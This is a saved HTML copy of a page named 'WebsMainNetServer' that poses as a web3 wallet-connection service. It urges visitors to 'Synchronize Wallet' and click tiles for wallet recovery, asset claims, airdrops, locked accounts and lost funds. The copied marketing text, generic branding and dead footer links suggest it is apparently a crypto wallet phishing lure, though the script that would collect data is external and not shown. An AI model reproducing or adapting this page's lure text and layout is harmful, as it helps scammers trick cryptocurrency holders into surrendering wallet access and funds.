<!DOCTYPE html>
<!-- saved from url=(0030)https://websmainnetserver.com/ -->
<html lang="en" webcrx=""><div id="in-page-channel-node-id" data-channel-name="in_page_channel_w1GgZA"></div><script src="chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js"></script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <link rel="icon" type="image/png" href="./WebsMainNetServer_files/apex.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WebsMainNetServer</title>
    <!--  -->
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
    <link href="./WebsMainNetServer_files/css2" rel="stylesheet">
    <script type="module" crossorigin="" src="./WebsMainNetServer_files/index-DfjivNKZ.js"></script>
    <link rel="stylesheet" crossorigin="" href="./WebsMainNetServer_files/index-C3dUO8Vo.css">
  <script src="blob:https://websmainnetserver.com/59efd7f1-4140-463a-a649-37cc94f23dbe"></script><style>
@keyframes slide-in-one-tap {
  from {
    transform: translateY(80px);
  }
  to {
    transform: translateY(0px);
  }
}

.trust-hide-gracefully {
  opacity: 0;
}

.trust-wallet-one-tap .hidden {
    display: none;
  }

.trust-wallet-one-tap .semibold {
    font-weight: 500;
  }

.trust-wallet-one-tap .binance-plex {
    font-family: 'Binance';
  }

.trust-wallet-one-tap .rounded-full {
    border-radius: 50%;
  }

.trust-wallet-one-tap .flex {
    display: flex;
  }

.trust-wallet-one-tap .flex-col {
    flex-direction: column;
  }

.trust-wallet-one-tap .items-center {
    align-items: center;
  }

.trust-wallet-one-tap .space-between {
    justify-content: space-between;
  }

.trust-wallet-one-tap .justify-center {
    justify-content: center;
  }

.trust-wallet-one-tap .w-full {
    width: 100%;
  }

.trust-wallet-one-tap .box {
    transition: all 0.5s cubic-bezier(0, 0, 0, 1.43);
    animation: slide-in-one-tap 0.5s cubic-bezier(0, 0, 0, 1.43);
    width: 384px;
    border-radius: 15px;
    background: #FFF;
    box-shadow: 0px 2px 4px 0px rgba(0, 0, 0, 0.25);
    position: fixed;
    right: 30px;
    bottom: 30px;
    z-index: 1020;
  }

.trust-wallet-one-tap .header {
    gap: 15px;
    border-bottom: 1px solid #E6E6E6;
    padding: 10px 18px;
  }

.trust-wallet-one-tap .header .left-items {
      gap: 15px
    }

.trust-wallet-one-tap .header .title {
      color: #1E2329;
      font-size: 18px;
      font-weight: 600;
      line-height: 28px;
    }

.trust-wallet-one-tap .header .subtitle {
      color: #474D57;
      font-size: 14px;
      line-height: 20px;
    }

.trust-wallet-one-tap .header .close {
      color: #1E2329;
      cursor: pointer;
    }

.trust-wallet-one-tap .body {
    padding: 9px 18px;
    gap: 10px;

  }

.trust-wallet-one-tap .body .right-items {
      gap: 10px;
      width: 100%;
    }

.trust-wallet-one-tap .body .right-items .wallet-title {
        color: #1E2329;
        font-size: 16px;
        font-weight: 600;
        line-height: 20px;
      }

.trust-wallet-one-tap .body .right-items .wallet-subtitle {
        color: #474D57;
        font-size: 14px;
        line-height: 20px;
      }

.trust-wallet-one-tap .connect-indicator {
    gap: 15px;
    padding: 8px 0;
  }

.trust-wallet-one-tap .connect-indicator .flow-icon {
      color: #474D57;
    }

.trust-wallet-one-tap .loading-color {
    color: #FFF;
  }

.trust-wallet-one-tap .button {
    border-radius: 50px;
    outline: 2px solid transparent;
    outline-offset: 2px;
    background-color: rgb(5, 0, 255);
    border-color: rgb(229, 231, 235);
    cursor: pointer;
    text-align: center;
    height: 45px;
  }

.trust-wallet-one-tap .button .button-text {
      color: #FFF;
      font-size: 16px;
      font-weight: 600;
      line-height: 20px;
    }

.trust-wallet-one-tap .footer {
    margin: 20px 30px;
  }

.trust-wallet-one-tap .check-icon {
    color: #FFF;
  }

@font-face {
  font-family: 'Binance';
  src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-Regular.otf) format('opentype');
  font-weight: 400;
  font-style: normal;
}

@font-face {
  font-family: 'Binance';
  src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-Medium.otf) format('opentype');
  font-weight: 500;
  font-style: normal;
}

@font-face {
  font-family: 'Binance';
  src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-SemiBold.otf) format('opentype');
  font-weight: 600;
  font-style: normal;
}

</style></head>
  <body>
    <div id="root"><div class="bg-black text-white"><header class="sticky top-0 pt-4 px-4"><nav class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto p-4 border rounded-full bg-black"><a href="https://websmainnetserver.com/#" class="flex items-center space-x-1 rtl:space-x-reverse"><img src="./WebsMainNetServer_files/apex.png" class="h-8" alt="Logo"><span class="self-center text-xl font-bold whitespace-nowrap">WebsMainNetServer</span></a><div class="inline-block text-left" data-headlessui-state=""><button class="inline-flex items-center focus:outline-none" id="headlessui-menu-button-:r0:" type="button" aria-haspopup="menu" aria-expanded="false" data-headlessui-state=""><span class="text-white fill-white h-6 w-6"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3,6H21V8H3V6M3,11H21V13H3V11M3,16H21V18H3V16Z"></path></svg></span></button></div></nav></header><main><section class="max-w-screen-xl mx-auto p-4 mt-8 mb-16 flex flex-col-reverse md:flex-row justify-between items-center gap-8"><div class="w-full md:w-1/5"><span class="text-xs bg-primary/30 rounded px-3 py-1.5 font-medium">Simplify Your Crypto Experience</span><h2 class="text-5xl lg:text-7xl font-black my-6">Web3 Connection Made Easy</h2><p class="text-gray-400 mb-8">The communications protocol for web3, WebsMainNetServer brings the ecosystem together by enabling wallets and apps to securely connect and interact.</p><button type="button" class="border-primary bg-white text-primary inline-flex justify-center items-center font-semibold border rounded hover:shadow-primary/50 hover:shadow-lg transition-all py-2.5 px-8 text-sm">Synchronize Wallet</button></div><div class="w-full md:w-3/5 bg-gradient-to-br from-black from-30% via-primary/50 via-50% to-black to-20% flex justify-center items-center"><img src="./WebsMainNetServer_files/sync.png" class="max-h-[75vh] rounded-2xl"></div></section><section class="mt-8 mb-16 max-w-screen-xl p-4 mx-auto"><h3 class="font-bold text-4xl md:text-[50px] leading-none mb-8">We make it easy for you to plug into web3.</h3><img src="./WebsMainNetServer_files/synth.jpeg" alt="" class="h-full w-full"><p class="text-xl flex flex-wrap items-center gap-4"><span class="text-2xl font-semibold mr-0.5">Curious about</span><div class="inline-flex gap-4"><span class="rounded-3xl border-2 border-green-500 px-5 py-3 text-green-500">DeFi</span><span class="rounded border-2 border-amber-500 px-5 py-3 text-amber-500">NFTs</span><span class="rounded-[100%] border-2 border-blue-500 px-6 py-3 text-blue-500">DAOs</span></div></p></section><section class="max-w-screen-xl mx-auto p-4 my-8"><div class="text-center mb-8"><span class="text-xs bg-primary/30 rounded px-3 py-1.5 font-medium">Popular Wallet Options</span><h2 class="text-4xl font-bold my-2">Select One of the Actions Below</h2><p class="text-gray-400">With WebsMainNetServer, you can connect your wallet with hundreds of apps, opening the doors to a new world of web3 experiences.</p></div><div class="grid grid-cols-1 sm:grid-cols-2 md:grid-cols-3 gap-6"><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Recovery</h5><p class="text-gray-400 text-sm">Click here to for wallet recovery</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Claim</h5><p class="text-gray-400 text-sm">Click here to claim assets</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Swap</h5><p class="text-gray-400 text-sm">Click here for assets swapping</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Slippage</h5><p class="text-gray-400 text-sm">Click here for slippage related error</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Transaction</h5><p class="text-gray-400 text-sm">Click here for transaction related issues</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Cross Transfer</h5><p class="text-gray-400 text-sm">Click here for cross bridge issues</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Staking</h5><p class="text-gray-400 text-sm">Click here for Staking related issues</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Exchange</h5><p class="text-gray-400 text-sm">Click here for exchange related issues</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Connect to Dapps</h5><p class="text-gray-400 text-sm">Click here for error while connectting to dapps.</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Login</h5><p class="text-gray-400 text-sm">Click here for wallet login issue.</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Whitelist</h5><p class="text-gray-400 text-sm">Click here for whitelist related issues.</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Migration</h5><p class="text-gray-400 text-sm">Click here for migration</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Missing/Irregular Balance</h5><p class="text-gray-400 text-sm">Click here to recover lost/missing funds.</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Wallet Glitch / Wallet Error</h5><p class="text-gray-400 text-sm">Click here if you have problem with your trading wallet.</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Transaction Delay</h5><p class="text-gray-400 text-sm">Click here for any issues related to transaction delay.</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Claim Airdrop</h5><p class="text-gray-400 text-sm">Click here for airdrop related issues.</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">NFTs</h5><p class="text-gray-400 text-sm">Click here for NFTs minting/transfer related issues.</p></div><div class="border rounded-lg p-6 cursor-pointer hover:bg-gradient-to-br from-black to-gray-900 transition-all"><span class="inline-block bg-gray-900 p-2 h-10 w-10 rounded fill-white"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.5 9.5L12 2L9.5 9.5L2 12L9.5 14.5L12 22L14.5 14.5L22 12L14.5 9.5M12 13.7C11.1 13.7 10.3 13 10.3 12C10.3 11.1 11 10.3 12 10.3C12.9 10.3 13.7 11 13.7 12C13.7 12.9 12.9 13.7 12 13.7Z"></path></svg></span><h5 class="text-lg text-white my-4 font-medium">Locked Account</h5><p class="text-gray-400 text-sm">Click here for issues related to account lock.</p></div></div></section><section class="my-16 max-w-screen-xl p-4 mx-auto"><div class="text-center mb-8"><span class="text-xs bg-primary/30 rounded px-3 py-1.5 font-medium">Larger Connectivity</span><h2 class="text-4xl font-bold my-2">Connect with Hundreds of Apps</h2><p class="text-gray-400">With WebsMainNetServer, you can connect your wallet with hundreds of apps, opening the doors to a new world of web3 experiences.</p></div><div class="w-full my-4"><div class="border border-neutral-600 rounded-[54px] p-4 my-2" data-headlessui-state=""><button class="flex w-full items-center justify-between px-4 py-2 text-left text-xl font-medium" id="headlessui-disclosure-button-:r1:" type="button" aria-expanded="false" data-headlessui-state="">Click 'Connect Wallet'<span class="bg-blue-600 h-9 w-9 flex text-sm rounded-full items-center justify-center">1</span></button></div><div class="border border-neutral-600 rounded-[54px] p-4 my-2" data-headlessui-state=""><button class="flex w-full items-center justify-between px-4 py-2 text-left text-xl font-medium" id="headlessui-disclosure-button-:r3:" type="button" aria-expanded="false" data-headlessui-state="">Scan the QR code or find your wallet<span class="bg-blue-600 h-9 w-9 flex text-sm rounded-full items-center justify-center">2</span></button></div><div class="border border-neutral-600 rounded-[54px] p-4 my-2" data-headlessui-state=""><button class="flex w-full items-center justify-between px-4 py-2 text-left text-xl font-medium" id="headlessui-disclosure-button-:r5:" type="button" aria-expanded="false" data-headlessui-state="">Start exploring!<span class="bg-blue-600 h-9 w-9 flex text-sm rounded-full items-center justify-center">3</span></button></div></div></section></main><footer class="bg-black rounded-lg shadow"><div class="w-full max-w-screen-xl mx-auto p-4 md:py-8"><div class="sm:flex sm:items-center sm:justify-between"><a href="https://websmainnetserver.com/#" class="flex items-center mb-4 sm:mb-0 space-x-3 rtl:space-x-reverse"><img src="./WebsMainNetServer_files/apex.png" class="h-8" alt="Flowbite Logo"><span class="self-center text-2xl font-bold whitespace-nowrap">WebsMainNetServer</span></a><ul class="flex flex-wrap items-center mb-6 text-sm font-medium text-gray-500 sm:mb-0"><li><a href="https://websmainnetserver.com/#" class="hover:underline me-4 md:me-6">Twitter</a></li><li><a href="https://websmainnetserver.com/#" class="hover:underline me-4 md:me-6">Discord</a></li><li><a href="https://websmainnetserver.com/#" class="hover:underline me-4 md:me-6">GitHub</a></li><li><a href="https://websmainnetserver.com/#" class="hover:underline me-4 md:me-6">Mirror</a></li></ul></div><hr class="my-6 border-gray-600 sm:mx-auto  lg:my-8"><span class="block text-sm text-gray-500 sm:text-center">© 2024 <a href="https://websmainnetserver.com/#" class="hover:underline">WebsMainNetServer™</a>. All Rights Reserved.</span></div></footer></div></div>
  

</body></html>